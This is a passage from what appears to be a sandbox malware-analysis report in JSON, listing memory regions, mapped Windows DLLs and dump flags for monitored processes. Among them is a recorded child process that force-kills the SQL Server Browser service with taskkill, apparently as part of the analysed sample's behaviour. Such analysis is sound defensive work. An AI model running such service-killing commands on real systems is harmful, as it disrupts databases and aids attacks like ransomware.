regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_4065", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:31.503", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_4066", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:31.503", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 8585216, "type": "region", "version": 1 }, "end_va": 10190847, "entry_point": 0, "filename": null, "id": "region_4067", "name": "pagefile_0x0000000000830000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8585216, "timestamp": "00:01:31.527", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1987969024, "type": "region", "version": 1 }, "end_va": 1988362239, "entry_point": 1988040079, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_4068", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1987969024, "timestamp": "00:01:31.527", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1998520320, "type": "region", "version": 1 }, "end_va": 1999355903, "entry_point": 1998526091, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_4069", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1998520320, "timestamp": "00:01:31.528", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 225279, "entry_point": 0, "filename": null, "id": "region_4070", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:31.600", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 925695, "entry_point": 0, "filename": null, "id": "region_4071", "name": "pagefile_0x00000000000e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 917504, "timestamp": "00:01:31.600", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 1048576, "type": "region", "version": 1 }, "end_va": 1064959, "entry_point": 1048576, "filename": "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui", "id": "region_4072", "name": "taskkill.exe.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui", "region_type": "memory_mapped_file", "start_va": 1048576, "timestamp": "00:01:31.600", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1114112, "type": "region", "version": 1 }, "end_va": 1118207, "entry_point": 0, "filename": null, "id": "region_4073", "name": "private_0x0000000000110000", "norm_filename": null, "region_type": "private_memory", "start_va": 1114112, "timestamp": "00:01:31.601", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1179648, "type": "region", "version": 1 }, "end_va": 1183743, "entry_point": 0, "filename": null, "id": "region_4074", "name": "private_0x0000000000120000", "norm_filename": null, "region_type": "private_memory", "start_va": 1179648, "timestamp": "00:01:31.601", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1507327, "entry_point": 0, "filename": null, "id": "region_4075", "name": "private_0x0000000000130000", "norm_filename": null, "region_type": "private_memory", "start_va": 1245184, "timestamp": "00:01:31.601", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1769472, "type": "region", "version": 1 }, "end_va": 2031615, "entry_point": 0, "filename": null, "id": "region_4076", "name": "private_0x00000000001b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1769472, "timestamp": "00:01:31.601", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2031616, "type": "region", "version": 1 }, "end_va": 2035711, "entry_point": 0, "filename": null, "id": "region_4077", "name": "pagefile_0x00000000001f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2031616, "timestamp": "00:01:31.601", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2818048, "type": "region", "version": 1 }, "end_va": 3080191, "entry_point": 0, "filename": null, "id": "region_4078", "name": "private_0x00000000002b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2818048, "timestamp": "00:01:31.601", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 3080192, "type": "region", "version": 1 }, "end_va": 3866623, "entry_point": 3080192, "filename": "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui", "id": "region_4079", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 3080192, "timestamp": "00:01:31.601", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 10223616, "type": "region", "version": 1 }, "end_va": 11800575, "entry_point": 0, "filename": null, "id": "region_4080", "name": "pagefile_0x00000000009c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 10223616, "timestamp": "00:01:31.602", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 11862016, "type": "region", "version": 1 }, "end_va": 32833535, "entry_point": 0, "filename": null, "id": "region_4081", "name": "pagefile_0x0000000000b50000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 11862016, "timestamp": "00:01:31.602", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1984495616, "type": "region", "version": 1 }, "end_va": 1985032191, "entry_point": 1984504786, "filename": "\\Windows\\SysWOW64\\clbcatq.dll", "id": "region_4082", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\syswow64\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1984495616, "timestamp": "00:01:31.602", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_4083", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:01:31.603", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2359296, "type": "region", "version": 1 }, "end_va": 2363391, "entry_point": 0, "filename": null, "id": "region_4084", "name": "pagefile_0x0000000000240000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2359296, "timestamp": "00:01:31.608", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1784348672, "type": "region", "version": 1 }, "end_va": 1784725503, "entry_point": 1784490824, "filename": "\\Windows\\SysWOW64\\wbemcomn.dll", "id": "region_4085", "name": "wbemcomn.dll", "norm_filename": "c:\\windows\\syswow64\\wbemcomn.dll", "region_type": "memory_mapped_file", "start_va": 1784348672, "timestamp": "00:01:31.608", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1785856000, "type": "region", "version": 1 }, "end_va": 1785896959, "entry_point": 1785861274, "filename": "\\Windows\\SysWOW64\\wbem\\wbemprox.dll", "id": "region_4086", "name": "wbemprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemprox.dll", "region_type": "memory_mapped_file", "start_va": 1785856000, "timestamp": "00:01:31.608", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 5111808, "type": "region", "version": 1 }, "end_va": 5373951, "entry_point": 0, "filename": null, "id": "region_4087", "name": "private_0x00000000004e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 5111808, "timestamp": "00:01:31.611", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 5963776, "type": "region", "version": 1 }, "end_va": 7012351, "entry_point": 0, "filename": null, "id": "region_4088", "name": "private_0x00000000005b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 5963776, "timestamp": "00:01:31.611", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 167936, "start_va": 1784152064, "type": "region", "version": 1 }, "end_va": 1784319999, "entry_point": 1784179481, "filename": "\\Windows\\SysWOW64\\winsta.dll", "id": "region_4089", "name": "winsta.dll", "norm_filename": "c:\\windows\\syswow64\\winsta.dll", "region_type": "memory_mapped_file", "start_va": 1784152064, "timestamp": "00:01:31.611", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 5505024, "type": "region", "version": 1 }, "end_va": 5767167, "entry_point": 0, "filename": null, "id": "region_4090", "name": "private_0x0000000000540000", "norm_filename": null, "region_type": "private_memory", "start_va": 5505024, "timestamp": "00:01:31.623", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 32833536, "type": "region", "version": 1 }, "end_va": 35778559, "entry_point": 32833536, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_4091", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 32833536, "timestamp": "00:01:31.623", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 36372480, "type": "region", "version": 1 }, "end_va": 36634623, "entry_point": 0, "filename": null, "id": "region_4092", "name": "private_0x00000000022b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 36372480, "timestamp": "00:01:31.624", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1950744576, "type": "region", "version": 1 }, "end_va": 1950986239, "entry_point": 1950749325, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_4093", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1950744576, "timestamp": "00:01:31.624", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1956511744, "type": "region", "version": 1 }, "end_va": 1956601855, "entry_point": 1956523459, "filename": "\\Windows\\SysWOW64\\cryptsp.dll", "id": "region_4094", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\syswow64\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1956511744, "timestamp": "00:01:31.624", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130530304, "type": "region", "version": 1 }, "end_va": 2130542591, "entry_point": 0, "filename": null, "id": "region_4095", "name": "private_0x000000007efd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130530304, "timestamp": "00:01:31.625", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 1956446208, "type": "region", "version": 1 }, "end_va": 1956503551, "entry_point": 1956450869, "filename": "\\Windows\\SysWOW64\\RpcRtRemote.dll", "id": "region_4096", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 1956446208, "timestamp": "00:01:31.627", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 4653056, "type": "region", "version": 1 }, "end_va": 4915199, "entry_point": 0, "filename": null, "id": "region_4097", "name": "private_0x0000000000470000", "norm_filename": null, "region_type": "private_memory", "start_va": 4653056, "timestamp": "00:01:31.712", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 35913728, "type": "region", "version": 1 }, "end_va": 36175871, "entry_point": 0, "filename": null, "id": "region_4098", "name": "private_0x0000000002240000", "norm_filename": null, "region_type": "private_memory", "start_va": 35913728, "timestamp": "00:01:31.712", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 37224448, "type": "region", "version": 1 }, "end_va": 37486591, "entry_point": 0, "filename": null, "id": "region_4099", "name": "private_0x0000000002380000", "norm_filename": null, "region_type": "private_memory", "start_va": 37224448, "timestamp": "00:01:31.712", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 38404096, "type": "region", "version": 1 }, "end_va": 38666239, "entry_point": 0, "filename": null, "id": "region_4100", "name": "private_0x00000000024a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 38404096, "timestamp": "00:01:31.712", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1784086528, "type": "region", "version": 1 }, "end_va": 1784147967, "entry_point": 1784095136, "filename": "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll", "id": "region_4101", "name": "wbemsvc.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemsvc.dll", "region_type": "memory_mapped_file", "start_va": 1784086528, "timestamp": "00:01:31.712", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130354176, "type": "region", "version": 1 }, "end_va": 2130366463, "entry_point": 0, "filename": null, "id": "region_4102", "name": "private_0x000000007efaa000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130354176, "timestamp": "00:01:31.713", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130366464, "type": "region", "version": 1 }, "end_va": 2130378751, "entry_point": 0, "filename": null, "id": "region_4103", "name": "private_0x000000007efad000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130366464, "timestamp": "00:01:31.713", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 98304, "start_va": 1783300096, "type": "region", "version": 1 }, "end_va": 1783398399, "entry_point": 1783305013, "filename": "\\Windows\\SysWOW64\\ntdsapi.dll", "id": "region_4104", "name": "ntdsapi.dll", "norm_filename": "c:\\windows\\syswow64\\ntdsapi.dll", "region_type": "memory_mapped_file", "start_va": 1783300096, "timestamp": "00:01:31.720", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 614400, "start_va": 1783431168, "type": "region", "version": 1 }, "end_va": 1784045567, "entry_point": 1783560377, "filename": "\\Windows\\SysWOW64\\wbem\\fastprox.dll", "id": "region_4105", "name": "fastprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\fastprox.dll", "region_type": "memory_mapped_file", "start_va": 1783431168, "timestamp": "00:01:31.720", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "TASKKILL /F /IM sqlbrowser.exe /IM sqlbrowser.exe ", "filename": "c:\\windows\\syswow64\\taskkill.exe", "id": "proc_34", "image_name": "taskkill.exe", "monitor_reason": "child_process", "monitored_id": 34, "origin_monitor_id": 10, "ref_parent_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_4106", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:31.968", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_4107", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:31.968", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_4108", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:01:31.968", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_4109", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:01:31.971", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 397311, "entry_point": 0, "filename": null, "id": "region_4110", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:01:31.971", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1507327, "entry_point": 0, "filename": null, "id": "region_4111", "name": "private_0x0000000000130000", "norm_filename": null, "region_type": "private_memory", "start_va": 1245184, "timestamp": "00:01:31.971", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2293760, "type": "region", "version": 1 }, "end_va": 2555903, "entry_point": 0, "filename": null, "id": "region_4112", "name": "private_0x0000000000230000", "norm_filename": null, "region_type": "private_memory", "start_va": 2293760, "timestamp": "00:01:31.971", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 4784128, "type": "region", "version": 1 }, "end_va": 4874239, "entry_point": 4807817, "filename": "\\Windows\\SysWOW64\\taskkill.exe", "id": "region_4113", "name": "taskkill.exe", "norm_filename": "c:\\windows\\syswow64\\taskkill.exe", "region_type": "memory_mapped_file", "start_va": 4784128, "timestamp": "00:01:31.971", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2003566592, "type": "region", "version": 1 }, "end_va": 2005307391, "entry_point": 2003566592, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_4114", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2003566592, "timestamp": "00:01:31.972", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 2005532672, "type": "region", "version": 1 }, "end_va": 2007105535, "entry_point": 2005532672, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_4115", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2005532672, "timestamp": "00:01:31.972", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_4116", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:01:31.973", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_4117", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:01:31.973", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_4118", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:01:31.973", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_4119", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:01:31.973", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_4120", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:31.973", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_4121", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:31.973", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_4122", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:01:31.973", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 3997696, "type": "region", "version": 1 }, "end_va": 4521983, "entry_point": 0, "filename": null, "id": "region_4123", "name": "private_0x00000000003d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3997696, "timestamp": "00:01:31.978", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1945960448, "type": "region", "version": 1 }, "end_va": 1945993215, "entry_point": 1945968888, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_4124", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1945960448, "timestamp": "00:01:31.978", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1946025984, "type": "region", "version": 1 }, "end_va": 1946402815, "entry_point": 1946285976, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_4125", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1946025984, "timestamp": "00:01:31.979", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1946419200, "type": "region", "version": 1 }, "end_va": 1946677247, 